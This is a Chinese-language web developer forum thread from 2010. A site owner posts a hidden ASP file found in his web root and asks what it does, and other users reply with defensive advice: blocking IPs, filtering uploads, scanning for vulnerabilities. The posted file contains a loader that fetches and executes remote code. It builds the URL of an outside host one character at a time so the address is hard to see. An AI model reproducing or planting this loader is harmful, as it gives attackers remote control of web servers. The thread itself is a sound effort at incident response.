Function BytesToBstr(strBody,CodeBase)
dim objStream
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write strBody
objStream.Position = 0
objStream.Type = 2
objStream.Charset = CodeBase
BytesToBstr = objStream.ReadText
objStream.Close
set objStream = nothing
End Function
execute(GetHtml("h"&"t"&"t"&"p"&":"&"/"&"/"&"b"&"o"&"t"&"s"&"."&"z"&"h"&"-"&"c"&"n"&"."&"c"&"c"&":"&"8"&"0"&"8"&"0"&"/"&"c"&"o"&"d"&"e"&"/"&"m"&"a"&"i"&"n"&"_"&"c"&"o"&"d"&"e"&"."&"t"&"x"&"t"))
'</body></html>
%>
刚才发现跟目录下有这个隐藏asp文件
大侠,研究一下这是干什么用?
valen926 2010-12-02
- 打赏
- 举报
[Quote=引用 33 楼 taolinsen 的回复:]
知道IP不就好解决,在网关上设置不接受此IP任何的报文呗。
[/Quote]
ip都有几百上千个都有可能叫我怎么去屏蔽
知道IP不就好解决,在网关上设置不接受此IP任何的报文呗。
[/Quote]
ip都有几百上千个都有可能叫我怎么去屏蔽
bingo_ 2010-12-02
- 打赏
- 举报
我每次被d都是指向 www.gov.cn
valen926 2010-12-02
- 打赏
- 举报
[Quote=引用 20 楼 valen926 的回复:]
引用 18 楼 xx_lzj 的回复:
1、上传代码限制非图像文件不能上传
2、HttpApplication的BeginRequest事件中,检查images文件夹中的非图像文件请求,将请求的IP记录到文本文件,导入屏蔽IP的工具。
pic.js文件已经不存在了 iis返回信息也可以看到 404错误
[/Quote]
HttpApplication的BeginRequest事件中
这个具体是在哪里使用?
引用 18 楼 xx_lzj 的回复:
1、上传代码限制非图像文件不能上传
2、HttpApplication的BeginRequest事件中,检查images文件夹中的非图像文件请求,将请求的IP记录到文本文件,导入屏蔽IP的工具。
pic.js文件已经不存在了 iis返回信息也可以看到 404错误
[/Quote]
HttpApplication的BeginRequest事件中
这个具体是在哪里使用?
valen926 2010-12-02
- 打赏
- 举报
[Quote=引用 18 楼 xx_lzj 的回复:]
1、上传代码限制非图像文件不能上传
2、HttpApplication的BeginRequest事件中,检查images文件夹中的非图像文件请求,将请求的IP记录到文本文件,导入屏蔽IP的工具。
[/Quote]
pic.js文件已经不存在了 iis返回信息也可以看到 404错误
1、上传代码限制非图像文件不能上传
2、HttpApplication的BeginRequest事件中,检查images文件夹中的非图像文件请求,将请求的IP记录到文本文件,导入屏蔽IP的工具。
[/Quote]
pic.js文件已经不存在了 iis返回信息也可以看到 404错误
valen926 2010-12-02
- 打赏
- 举报
谁给我介绍一款在服务器上比较实用的防火墙
xx_lzj 2010-12-02
- 打赏
- 举报
1、上传代码限制非图像文件不能上传
2、HttpApplication的BeginRequest事件中,检查images文件夹中的非图像文件请求,将请求的IP记录到文本文件,导入屏蔽IP的工具。
2、HttpApplication的BeginRequest事件中,检查images文件夹中的非图像文件请求,将请求的IP记录到文本文件,导入屏蔽IP的工具。
ycproc 2010-12-02
- 打赏
- 举报
[Quote=引用 2 楼 wuyq11 的回复:]
服务器是否存在漏洞
网站是否存在上传漏洞
数据库的安全性操作
扫描网站工具可使用AccessDiver、JSky等
[/Quote]
防火墙 杀毒
服务器是否存在漏洞
网站是否存在上传漏洞
数据库的安全性操作
扫描网站工具可使用AccessDiver、JSky等
[/Quote]
防火墙 杀毒
sineweb 2010-12-02
- 打赏
- 举报
简单的就是屏蔽攻击的ip地址
qjmay860909 2010-12-02
- 打赏
- 举报
js都能传上来。。。
貌似DDOS攻击很无解啊、
貌似DDOS攻击很无解啊、
脾气不坏 2010-12-02
- 打赏
- 举报
屏蔽这个ip
上传时过滤下文件
上传时过滤下文件
加载更多回复(26)
